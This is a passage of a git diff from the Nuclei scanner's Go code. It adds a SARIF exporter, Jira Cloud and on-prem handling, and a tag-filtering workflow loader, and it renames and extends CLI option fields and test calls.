+ } + if options.AllowList != nil { options.AllowList.Compile() } @@ -129,6 +138,14 @@ func New(options *Options, db string) (*Client, error) { } client.exporters = append(client.exporters, exporter) } + if options.SarifExporter != nil { + exporter, err := sarif.New(options.SarifExporter) + if err != nil { + return nil, errors.Wrap(err, "could not create exporting client") + } + client.exporters = append(client.exporters, exporter) + } + storage, err := dedupe.New(db) if err != nil { return nil, err @@ -137,9 +154,22 @@ func New(options *Options, db string) (*Client, error) { return client, nil } +// RegisterTracker registers a custom tracker to the reporter +func (c *Client) RegisterTracker(tracker Tracker) { + c.trackers = append(c.trackers, tracker) +} + +// RegisterExporter registers a custom exporter to the reporter +func (c *Client) RegisterExporter(exporter Exporter) { + c.exporters = append(c.exporters, exporter) +} + // Close closes the issue tracker reporting client func (c *Client) Close() { c.dedupe.Close() + for _, exporter := range c.exporters { + exporter.Close() + } } // CreateIssue creates an issue in the tracker diff --git a/v2/pkg/reporting/trackers/jira/jira.go b/v2/pkg/reporting/trackers/jira/jira.go index 0c68b4ce37..5a56ed9e33 100644 --- a/v2/pkg/reporting/trackers/jira/jira.go +++ b/v2/pkg/reporting/trackers/jira/jira.go @@ -20,6 +20,8 @@ type Integration struct { // Options contains the configuration options for jira client type Options struct { + // Cloud value is set to true when Jira cloud is used + Cloud bool `yaml:"cloud"` // URL is the URL of the jira server URL string `yaml:"url"` // AccountID is the accountID of the jira user. @@ -36,8 +38,12 @@ type Options struct { // New creates a new issue tracker integration client based on options. func New(options *Options) (*Integration, error) { + username := options.Email + if !options.Cloud { + username = options.AccountID + } tp := jira.BasicAuthTransport{ - Username: options.Email, + Username: username, Password: options.Token, } jiraClient, err := jira.NewClient(tp.Client(), options.URL) @@ -51,15 +57,27 @@ func New(options *Options) (*Integration, error) { func (i *Integration) CreateIssue(event *output.ResultEvent) error { summary := format.Summary(event) - issueData := &jira.Issue{ - Fields: &jira.IssueFields{ - Assignee: &jira.User{AccountID: i.options.AccountID}, - Reporter: &jira.User{AccountID: i.options.AccountID}, + fields := &jira.IssueFields{ + Assignee: &jira.User{AccountID: i.options.AccountID}, + Reporter: &jira.User{AccountID: i.options.AccountID}, + Description: jiraFormatDescription(event), + Type: jira.IssueType{Name: i.options.IssueType}, + Project: jira.Project{Key: i.options.ProjectName}, + Summary: summary, + } + // On-prem version of Jira server does not use AccountID + if !i.options.Cloud { + fields = &jira.IssueFields{ + Assignee: &jira.User{Name: i.options.AccountID}, Description: jiraFormatDescription(event), Type: jira.IssueType{Name: i.options.IssueType}, Project: jira.Project{Key: i.options.ProjectName}, Summary: summary, - }, + } + } + + issueData := &jira.Issue{ + Fields: fields, } _, resp, err := i.jira.Issue.Create(issueData) if err != nil { @@ -92,6 +110,9 @@ func jiraFormatDescription(event *output.ResultEvent) string { builder.WriteString(event.Timestamp.Format("Mon Jan 2 15:04:05 -0700 MST 2006")) builder.WriteString("\n\n*Template Information*\n\n| Key | Value |\n") for k, v := range event.Info { + if k == "reference" { + continue + } builder.WriteString(fmt.Sprintf("| %s | %s |\n", k, v)) } builder.WriteString("\n*Request*\n\n{code}\n") @@ -107,7 +128,7 @@ func jiraFormatDescription(event *output.ResultEvent) string { builder.WriteString("\n{code}\n\n") if len(event.ExtractedResults) > 0 || len(event.Metadata) > 0 { - builder.WriteString("*Extra Information*\n\n") + builder.WriteString("\n*Extra Information*\n\n") if len(event.ExtractedResults) > 0 { builder.WriteString("*Extracted results*:\n\n") for _, v := range event.ExtractedResults { @@ -153,6 +174,26 @@ func jiraFormatDescription(event *output.ResultEvent) string { builder.WriteString("\n{code}\n") } } + if d, ok := event.Info["reference"]; ok { + builder.WriteString("\nReference: \n") + + switch v := d.(type) { + case string: + if !strings.HasPrefix(v, "-") { + builder.WriteString("- ") + } + builder.WriteString(v) + case []interface{}: + slice := types.ToStringSlice(v) + for i, item := range slice { + builder.WriteString("- ") + builder.WriteString(item) + if len(slice)-1 != i { + builder.WriteString("\n") + } + } + } + } builder.WriteString("\n---\nGenerated by [Nuclei|https://github.com/projectdiscovery/nuclei]") data := builder.String() return data diff --git a/v2/pkg/templates/compile.go b/v2/pkg/templates/compile.go index ede72bb416..f883101347 100644 --- a/v2/pkg/templates/compile.go +++ b/v2/pkg/templates/compile.go @@ -12,14 +12,13 @@ import ( "github.com/projectdiscovery/nuclei/v2/pkg/protocols" "github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/executer" "github.com/projectdiscovery/nuclei/v2/pkg/protocols/offlinehttp" - "github.com/projectdiscovery/nuclei/v2/pkg/types" - "github.com/projectdiscovery/nuclei/v2/pkg/workflows" + "github.com/projectdiscovery/nuclei/v2/pkg/workflows/compile" "gopkg.in/yaml.v2" ) // Parse parses a yaml request template file //nolint:gocritic // this cannot be passed by pointer -func Parse(filePath string, options protocols.ExecuterOptions) (*Template, error) { +func Parse(filePath string, preprocessor Preprocessor, options protocols.ExecuterOptions) (*Template, error) { template := &Template{} f, err := os.Open(filePath) @@ -34,6 +33,10 @@ func Parse(filePath string, options protocols.ExecuterOptions) (*Template, error } data = template.expandPreprocessors(data) + if preprocessor != nil { + data = preprocessor.Process(data) + } + err = yaml.NewDecoder(bytes.NewReader(data)).Decode(template) if err != nil { return nil, err @@ -45,22 +48,6 @@ func Parse(filePath string, options protocols.ExecuterOptions) (*Template, error if _, ok := template.Info["author"]; !ok { return nil, errors.New("no template author field provided") } - templateTags, ok := template.Info["tags"] - if !ok { - templateTags = "" - } - matchWithTags := false - if len(options.Options.Tags) > 0 { - if err := matchTemplateWithTags(types.ToString(templateTags), types.ToString(template.Info["severity"]), options.Options.Tags); err != nil { - return nil, fmt.Errorf("tags filter not matched %s", templateTags) - } - matchWithTags = true - } - if len(options.Options.ExcludeTags) > 0 && !matchWithTags { - if err := matchTemplateWithTags(types.ToString(templateTags), types.ToString(template.Info["severity"]), options.Options.ExcludeTags); err == nil { - return nil, fmt.Errorf("exclude-tags filter matched %s", templateTags) - } - } // Setting up variables regarding template metadata options.TemplateID = template.ID @@ -80,9 +67,12 @@ func Parse(filePath string, options protocols.ExecuterOptions) (*Template, error // Compile the workflow request if len(template.Workflows) > 0 { compiled := &template.Workflow - if err := template.compileWorkflow(&options, compiled); err != nil { - return nil, errors.Wrap(err, "could not compile workflow") + + loader, err := compile.NewLoader(&options) + if err != nil { + return nil, errors.Wrap(err, "could not create workflow loader") } + compileWorkflow(preprocessor, &options, compiled, loader) template.CompiledWorkflow = compiled template.CompiledWorkflow.Options = &options } @@ -147,112 +137,6 @@ func Parse(filePath string, options protocols.ExecuterOptions) (*Template, error if template.Executer == nil && template.CompiledWorkflow == nil && template.Code == "" { return nil, errors.New("cannot create template executer") } + template.Path = filePath return template, nil } - -// compileWorkflow compiles the workflow for execution -func (t *Template) compileWorkflow(options *protocols.ExecuterOptions, workflow *workflows.Workflow) error { - for _, workflow := range workflow.Workflows { - if err := t.parseWorkflow(workflow, options); err != nil { - return err - } - } - return nil -} - -// parseWorkflow parses and compiles all templates in a workflow recursively -func (t *Template) parseWorkflow(workflow *workflows.WorkflowTemplate, options *protocols.ExecuterOptions) error { - if err := t.parseWorkflowTemplate(workflow, options); err != nil { - return err - } - for _, subtemplates := range workflow.Subtemplates { - if err := t.parseWorkflow(subtemplates, options); err != nil { - return err - } - } - for _, matcher := range workflow.Matchers { - for _, subtemplates := range matcher.Subtemplates { - if err := t.parseWorkflow(subtemplates, options); err != nil { - return err - } - } - } - return nil -} - -// parseWorkflowTemplate parses a workflow template creating an executer -func (t *Template) parseWorkflowTemplate(workflow *workflows.WorkflowTemplate, options *protocols.ExecuterOptions) error { - paths, err := options.Catalog.GetTemplatePath(workflow.Template) - if err != nil { - return errors.Wrap(err, "could not get workflow template") - } - for _, path := range paths { - opts := protocols.ExecuterOptions{ - Output: options.Output, - Options: options.Options, - Progress: options.Progress, - Catalog: options.Catalog, - RateLimiter: options.RateLimiter, - IssuesClient: options.IssuesClient, - ProjectFile: options.ProjectFile, - } - template, err := Parse(path, opts) - if err != nil { - return errors.Wrap(err, "could not parse workflow template") - } - if template.Executer == nil { - return errors.New("no executer found for template") - } - workflow.Executers = append(workflow.Executers, &workflows.ProtocolExecuterPair{ - Executer: template.Executer, - Options: options, - }) - } - return nil -} - -// matchTemplateWithTags matches if the template matches a tag -func matchTemplateWithTags(tags, severity string, tagsInput []string) error { - actualTags := strings.Split(tags, ",") - if severity != "" { - actualTags = append(actualTags, severity) // also add severity to tag - } - - matched := false -mainLoop: - for _, t := range tagsInput { - commaTags := strings.Split(t, ",") - for _, tag := range commaTags { - tag = strings.TrimSpace(tag) - key, value := getKeyValue(tag) - - for _, templTag := range actualTags { - templTag = strings.TrimSpace(templTag) - tKey, tValue := getKeyValue(templTag) - - if strings.EqualFold(key, tKey) && strings.EqualFold(value, tValue) { - matched = true - break mainLoop - } - } - } - } - if !matched { - return errors.New("could not match template tags with input") - } - return nil -} - -// getKeyValue returns key value pair for a data string -func getKeyValue(data string) (key, value string) { - if strings.Contains(data, ":") { - parts := strings.SplitN(data, ":", 2) - if len(parts) == 2 { - key, value = parts[0], parts[1] - } - } - if value == "" { - value = data - } - return key, value -} diff --git a/v2/pkg/templates/compile_test.go b/v2/pkg/templates/compile_test.go deleted file mode 100644 index 6ce605f7a2..0000000000 --- a/v2/pkg/templates/compile_test.go +++ /dev/null @@ -1,41 +0,0 @@ -package templates - -import ( - "testing" - - "github.com/stretchr/testify/require" -) - -func TestMatchTemplateWithTags(t *testing.T) { - err := matchTemplateWithTags("php,linux,symfony", "", []string{"php"}) - require.Nil(t, err, "could not get php tag from input slice") - - err = matchTemplateWithTags("lang:php,os:linux,cms:symfony", "", []string{"cms:symfony"}) - require.Nil(t, err, "could not get php tag from input key value") - - err = matchTemplateWithTags("lang:php,os:linux,symfony", "", []string{"cms:symfony"}) - require.NotNil(t, err, "could get key value tag from input key value") - - err = matchTemplateWithTags("lang:php,os:linux,cms:jira", "", []string{"cms:symfony"}) - require.NotNil(t, err, "could get key value tag from input key value") - - t.Run("space", func(t *testing.T) { - err = matchTemplateWithTags("lang:php, os:linux, cms:symfony", "", []string{"cms:symfony"}) - require.Nil(t, err, "could get key value tag from input key value with space") - }) - - t.Run("comma-tags", func(t *testing.T) { - err = matchTemplateWithTags("lang:php,os:linux,cms:symfony", "", []string{"test,cms:symfony"}) - require.Nil(t, err, "could get key value tag from input key value with comma") - }) - - t.Run("severity", func(t *testing.T) { - err = matchTemplateWithTags("lang:php,os:linux,cms:symfony", "low", []string{"low"}) - require.Nil(t, err, "could get key value tag for severity") - }) - - t.Run("blank-tags", func(t *testing.T) { - err = matchTemplateWithTags("", "low", []string{"jira"}) - require.NotNil(t, err, "could get value tag for blank severity") - }) -} diff --git a/v2/pkg/templates/preprocessors.go b/v2/pkg/templates/preprocessors.go index 83241a0a58..ef6edeb1ca 100644 --- a/v2/pkg/templates/preprocessors.go +++ b/v2/pkg/templates/preprocessors.go @@ -8,6 +8,10 @@ import ( "github.com/segmentio/ksuid" ) +type Preprocessor interface { + Process(data []byte) []byte +} + var preprocessorRegex = regexp.MustCompile(`\{\{([a-z0-9_]+)\}\}`) // expandPreprocessors expands the pre-processors if any for a template data. diff --git a/v2/pkg/templates/templates.go b/v2/pkg/templates/templates.go index 3a6f476c06..4cadebda8a 100644 --- a/v2/pkg/templates/templates.go +++ b/v2/pkg/templates/templates.go @@ -39,4 +39,6 @@ type Template struct { TotalRequests int `yaml:"-" json:"-"` // Executer is the actual template executor for running template requests Executer protocols.Executer `yaml:"-" json:"-"` + + Path string `yaml:"-" json:"-"` } diff --git a/v2/pkg/templates/workflows.go b/v2/pkg/templates/workflows.go new file mode 100644 index 0000000000..628365d0a2 --- /dev/null +++ b/v2/pkg/templates/workflows.go @@ -0,0 +1,86 @@ +package templates + +import ( + "github.com/projectdiscovery/gologger" + "github.com/projectdiscovery/nuclei/v2/pkg/protocols" + "github.com/projectdiscovery/nuclei/v2/pkg/workflows" + "github.com/projectdiscovery/nuclei/v2/pkg/workflows/compile" +) + +// compileWorkflow compiles the workflow for execution +func compileWorkflow(preprocessor Preprocessor, options *protocols.ExecuterOptions, workflow *workflows.Workflow, loader compile.WorkflowLoader) { + for _, workflow := range workflow.Workflows { + if err := parseWorkflow(preprocessor, workflow, options, loader); err != nil { + gologger.Warning().Msgf("Could not parse workflow: %v\n", err) + continue + } + } +} + +// parseWorkflow parses and compiles all templates in a workflow recursively +func parseWorkflow(preprocessor Preprocessor, workflow *workflows.WorkflowTemplate, options *protocols.ExecuterOptions, loader compile.WorkflowLoader) error { + shouldNotValidate := false + + if len(workflow.Subtemplates) > 0 || len(workflow.Matchers) > 0 { + shouldNotValidate = true + } + if err := parseWorkflowTemplate(workflow, preprocessor, options, loader, shouldNotValidate); err != nil { + return err + } + for _, subtemplates := range workflow.Subtemplates { + if err := parseWorkflow(preprocessor, subtemplates, options, loader); err != nil { + gologger.Warning().Msgf("Could not parse workflow: %v\n", err) + continue + } + } + for _, matcher := range workflow.Matchers { + for _, subtemplates := range matcher.Subtemplates { + if err := parseWorkflow(preprocessor, subtemplates, options, loader); err != nil { + gologger.Warning().Msgf("Could not parse workflow: %v\n", err) + continue + } + } + } + return nil +} + +// parseWorkflowTemplate parses a workflow template creating an executer +func parseWorkflowTemplate(workflow *workflows.WorkflowTemplate, preprocessor Preprocessor, options *protocols.ExecuterOptions, loader compile.WorkflowLoader, noValidate bool) error { + var paths []string + + if len(workflow.Tags) > 0 { + paths = loader.ListTags([]string{workflow.Tags}) + } else { + paths = loader.ListTemplates([]string{workflow.Template}, noValidate) + } + if len(paths) == 0 { + return nil + } + for _, path := range paths { + opts := protocols.ExecuterOptions{ + Output: options.Output, + Options: options.Options, + Progress: options.Progress, + Catalog: options.Catalog, + Browser: options.Browser, + RateLimiter: options.RateLimiter, + IssuesClient: options.IssuesClient, + Interactsh: options.Interactsh, + ProjectFile: options.ProjectFile, + } + template, err := Parse(path, preprocessor, opts) + if err != nil { + gologger.Warning().Msgf("Could not parse workflow template %s: %v\n", path, err) + continue + } + if template.Executer == nil { + gologger.Warning().Msgf("Could not parse workflow template %s: no executer found\n", path) + continue + } + workflow.Executers = append(workflow.Executers, &workflows.ProtocolExecuterPair{ + Executer: template.Executer, + Options: options, + }) + } + return nil +} diff --git a/v2/pkg/types/interfaces.go b/v2/pkg/types/interfaces.go index 6b0b40f638..4461ca6ea9 100644 --- a/v2/pkg/types/interfaces.go +++ b/v2/pkg/types/interfaces.go @@ -8,6 +8,23 @@ import ( "strings" ) +// JSONScalarToString converts an interface coming from json to string +// Inspired from: https://github.com/cli/cli/blob/09b09810dd812e3ede54b59ad9d6912b946ac6c5/pkg/export/template.go#L72 +func JSONScalarToString(input interface{}) (string, error) { + switch tt := input.(type) { + case string: + return ToString(tt), nil + case float64: + return ToString(tt), nil + case nil: + return ToString(tt), nil + case bool: + return ToString(tt), nil + default: + return "", fmt.Errorf("cannot convert type to string: %v", tt) + } +} + // ToString converts an interface to string in a quick way func ToString(data interface{}) string { switch s := data.(type) { diff --git a/v2/pkg/types/types.go b/v2/pkg/types/types.go index a68e9f9187..a3bf7cd807 100644 --- a/v2/pkg/types/types.go +++ b/v2/pkg/types/types.go @@ -7,9 +7,9 @@ type Options struct { // Tags contains a list of tags to execute templates for. Multiple paths // can be specified with -l flag and -tags can be used in combination with // the -l flag. - Tags goflags.StringSlice + Tags goflags.NormalizedStringSlice // ExcludeTags is the list of tags to exclude - ExcludeTags goflags.StringSlice + ExcludeTags goflags.NormalizedStringSlice // Workflows specifies any workflows to run by nuclei Workflows goflags.StringSlice // AdvancedWorkflows specifies any advanced workflows to run by nuclei @@ -24,18 +24,23 @@ type Options struct { // CustomHeaders is the list of custom global headers to send with each request. CustomHeaders goflags.StringSlice // Severity filters templates based on their severity and only run the matching ones. - Severity goflags.StringSlice + Severity goflags.NormalizedStringSlice + // Author filters templates based on their author and only run the matching ones. + Author goflags.NormalizedStringSlice + // IncludeTags includes specified tags to be run even while being in denylist + IncludeTags goflags.NormalizedStringSlice + // IncludeTemplates includes specified templates to be run even while being in denylist + IncludeTemplates goflags.StringSlice + InternalResolversList []string // normalized from resolvers flag as well as file provided. - // BurpCollaboratorBiid is the Burp Collaborator BIID for polling interactions. - BurpCollaboratorBiid string // ProjectPath allows nuclei to use a user defined project folder ProjectPath string // InteractshURL is the URL for the interactsh server. InteractshURL string - // Target is a single URL/Domain to scan using a template - Target string - // Targets specifies the targets to scan using templates. - Targets string + // Target URLs/Domains to scan using a template + Targets goflags.StringSlice + // TargetsFilePath specifies the targets from a file to scan using templates. + TargetsFilePath string // Output is the file to write found results to. Output string // ProxyURL is the URL for the proxy server @@ -52,6 +57,8 @@ type Options struct { ReportingConfig string // DiskExportDirectory is the directory to export reports in markdown on disk to DiskExportDirectory string + // SarifExport is the file to export sarif output format to + SarifExport string // ResolversFile is a file containing resolvers for nuclei. ResolversFile string // StatsInterval is the number of seconds to display stats after @@ -68,6 +75,8 @@ type Options struct { Retries int // Rate-Limit is the maximum number of requests per specified target RateLimit int + // Rate-Limit is the maximum number of requests per minute for specified target + RateLimitMinute int // PageTimeout is the maximum time to wait for a page in seconds PageTimeout int // InteractionsCacheSize is the number of interaction-url->req to keep in cache at a time. @@ -84,6 +93,8 @@ type Options struct { // using same matchers/extractors from http protocol without the need // to send a new request, reading responses from a file. OfflineHTTP bool + // StatsJSON writes stats output in JSON format + StatsJSON bool // Headless specifies whether to allow headless mode templates Headless bool // ShowBrowser specifies whether the show the browser in headless mode @@ -102,8 +113,11 @@ type Options struct { Silent bool // Version specifies if we should just show version and exit Version bool + // Validate validates the templates passed to nuclei. + Validate bool // Verbose flag indicates whether to show verbose output or not - Verbose bool + Verbose bool + VerboseVerbose bool // No-Color disables the colored output. NoColor bool // UpdateTemplates updates the templates installed at startup @@ -130,4 +144,8 @@ type Options struct { NewTemplates bool // NoInteractsh disables use of interactsh server for interaction polling NoInteractsh bool + // UpdateNuclei checks for an update for the nuclei engine + UpdateNuclei bool + // NoUpdateTemplates disables checking for nuclei templates updates + NoUpdateTemplates bool } diff --git a/v2/pkg/workflows/compile.go b/v2/pkg/workflows/compile.go deleted file mode 100644 index 59d45e0623..0000000000 --- a/v2/pkg/workflows/compile.go +++ /dev/null @@ -1,30 +0,0 @@ -package workflows - -import ( - "os" - - "github.com/pkg/errors" - "github.com/projectdiscovery/nuclei/v2/pkg/protocols" - "gopkg.in/yaml.v2" -) - -// Parse a yaml workflow file -func Parse(file string, options *protocols.ExecuterOptions) (*Workflow, error) { - workflow := &Workflow{Options: options} - - f, err := os.Open(file) - if err != nil { - return nil, err - } - defer f.Close() - - err = yaml.NewDecoder(f).Decode(workflow) - if err != nil { - return nil, err - } - - if len(workflow.Workflows) == 0 { - return nil, errors.New("no workflow defined") - } - return workflow, nil -} diff --git a/v2/pkg/workflows/compile/compile.go b/v2/pkg/workflows/compile/compile.go new file mode 100644 index 0000000000..a7d82faed4 --- /dev/null +++ b/v2/pkg/workflows/compile/compile.go @@ -0,0 +1,73 @@ +package compile + +import ( + "github.com/projectdiscovery/gologger" + "github.com/projectdiscovery/nuclei/v2/pkg/catalog/loader/filter" + "github.com/projectdiscovery/nuclei/v2/pkg/catalog/loader/load" + "github.com/projectdiscovery/nuclei/v2/pkg/protocols" +) + +// WorkflowLoader is a loader interface required for workflow +// initialization. +type WorkflowLoader interface { + // ListTags lists a list of templates for tags from the provided templates directory + ListTags(tags []string) []string + // ListTemplates takes a list of templates and returns paths for them + ListTemplates(templatesList []string, noValidate bool) []string +} + +type workflowLoader struct { + pathFilter *filter.PathFilter + tagFilter *filter.TagFilter + options *protocols.ExecuterOptions +} + +// NewLoader returns a new workflow loader structure +func NewLoader(options *protocols.ExecuterOptions) (WorkflowLoader, error) { + tagFilter := filter.New(&filter.Config{ + Tags: options.Options.Tags, + ExcludeTags: options.Options.ExcludeTags, + Authors: options.Options.Author, + Severities: options.Options.Severity, + IncludeTags: options.Options.IncludeTags, + }) + pathFilter := filter.NewPathFilter(&filter.PathFilterConfig{ + IncludedTemplates: options.Options.IncludeTemplates, + ExcludedTemplates: options.Options.ExcludedTemplates, + }, options.Catalog) + return &workflowLoader{pathFilter: pathFilter, tagFilter: tagFilter, options: options}, nil +} + +// ListTags lists a list of templates for tags from the provided templates directory +func (w *workflowLoader) ListTags(tags []string) []string { + includedTemplates := w.options.Catalog.GetTemplatesPath([]string{w.options.Options.TemplatesDirectory}) + templatesMap := w.pathFilter.Match(includedTemplates) + + loadedTemplates := make([]string, 0, len(templatesMap)) + for k := range templatesMap { + loaded, err := load.Load(k, false, tags, w.tagFilter) + if err != nil { + gologger.Warning().Msgf("Could not load template %s: %s\n", k, err) + } else if loaded { + loadedTemplates = append(loadedTemplates, k) + } + } + return loadedTemplates +} + +// ListTemplates takes a list of templates and returns paths for them +func (w *workflowLoader) ListTemplates(templatesList []string, noValidate bool) []string { + includedTemplates := w.options.Catalog.GetTemplatesPath(templatesList) + templatesMap := w.pathFilter.Match(includedTemplates) + + loadedTemplates := make([]string, 0, len(templatesMap)) + for k := range templatesMap { + matched, err := load.Load(k, false, nil, w.tagFilter) + if err != nil { + gologger.Warning().Msgf("Could not load template %s: %s\n", k, err) + } else if matched || noValidate { + loadedTemplates = append(loadedTemplates, k) + } + } + return loadedTemplates +} diff --git a/v2/pkg/workflows/execute.go b/v2/pkg/workflows/execute.go index 3356875bb1..163cc98243 100644 --- a/v2/pkg/workflows/execute.go +++ b/v2/pkg/workflows/execute.go @@ -48,7 +48,11 @@ func (w *Workflow) runWorkflowStep(template *WorkflowTemplate, input string, res } }) } else { - firstMatched, err = executer.Executer.Execute(input) + var matched bool + matched, err = executer.Executer.Execute(input) + if matched { + firstMatched = true + } } if err != nil { if len(template.Executers) == 1 { diff --git a/v2/pkg/workflows/execute_test.go b/v2/pkg/workflows/execute_test.go index 67caa8cf7a..26f7c2b994 100644 --- a/v2/pkg/workflows/execute_test.go +++ b/v2/pkg/workflows/execute_test.go @@ -12,7 +12,7 @@ import ( ) func TestWorkflowsSimple(t *testing.T) { - progressBar, _ := progress.NewStatsTicker(0, false, false, 0) + progressBar, _ := progress.NewStatsTicker(0, false, false, false, 0) workflow := &Workflow{Options: &protocols.ExecuterOptions{Options: &types.Options{TemplateThreads: 10}}, Workflows: []*WorkflowTemplate{ {Executers: []*ProtocolExecuterPair{{ @@ -25,7 +25,7 @@ func TestWorkflowsSimple(t *testing.T) { } func TestWorkflowsSimpleMultiple(t *testing.T) { - progressBar, _ := progress.NewStatsTicker(0, false, false, 0) + progressBar, _ := progress.NewStatsTicker(0, false, false, false, 0) var firstInput, secondInput string workflow := &Workflow{Options: &protocols.ExecuterOptions{Options: &types.Options{TemplateThreads: 10}}, Workflows: []*WorkflowTemplate{ @@ -49,7 +49,7 @@ func TestWorkflowsSimpleMultiple(t *testing.T) { } func TestWorkflowsSubtemplates(t *testing.T) { - progressBar, _ := progress.NewStatsTicker(0, false, false, 0) + progressBar, _ := progress.NewStatsTicker(0, false, false, false, 0) var firstInput, secondInput string workflow := &Workflow{Options: &protocols.ExecuterOptions{Options: &types.Options{TemplateThreads: 10}}, Workflows: []*WorkflowTemplate{ @@ -74,7 +74,7 @@ func TestWorkflowsSubtemplates(t *testing.T) { } func TestWorkflowsSubtemplatesNoMatch(t *testing.T) { - progressBar, _ := progress.NewStatsTicker(0, false, false, 0) + progressBar, _ := progress.NewStatsTicker(0, false, false, false, 0) var firstInput, secondInput string workflow := &Workflow{Options: &protocols.ExecuterOptions{Options: &types.Options{TemplateThreads: 10}}, Workflows: []*WorkflowTemplate{ @@ -97,7 +97,7 @@ func TestWorkflowsSubtemplatesNoMatch(t *testing.T) { } func TestWorkflowsSubtemplatesWithMatcher(t *testing.T) { - progressBar, _ := progress.NewStatsTicker(0, false, false, 0) + progressBar, _ := progress.NewStatsTicker(0, false, false, false, 0) var firstInput, secondInput string workflow := &Workflow{Options: &protocols.ExecuterOptions{Options: &types.Options{TemplateThreads: 10}}, Workflows: []*WorkflowTemplate{ @@ -125,7 +125,7 @@ func TestWorkflowsSubtemplatesWithMatcher(t *testing.T) { } func TestWorkflowsSubtemplatesWithMatcherNoMatch(t *testing.T) { - progressBar, _ := progress.NewStatsTicker(0, false, false, 0) + progressBar, _ := progress.NewStatsTicker(0, false, false, false, 0) var firstInput, secondInput string workflow := &Workflow{Options: &protocols.ExecuterOptions{Options: &types.Options{TemplateThreads: 10}}, Workflows: []*WorkflowTemplate{ diff --git a/v2/pkg/workflows/workflows.go b/v2/pkg/workflows/workflows.go index 91a8ae3407..caae63a6da 100644 --- a/v2/pkg/workflows/workflows.go +++ b/v2/pkg/workflows/workflows.go @@ -14,6 +14,8 @@ type Workflow struct { type WorkflowTemplate struct { // Template is the template to run Template string `yaml:"template"` + // Tags to perform filtering of supplied templates on + Tags string `yaml:"tags"` // Matchers perform name based matching to run subtemplates for a workflow. Matchers []*Matcher `yaml:"matchers"` // Subtemplates are ran if the template matches.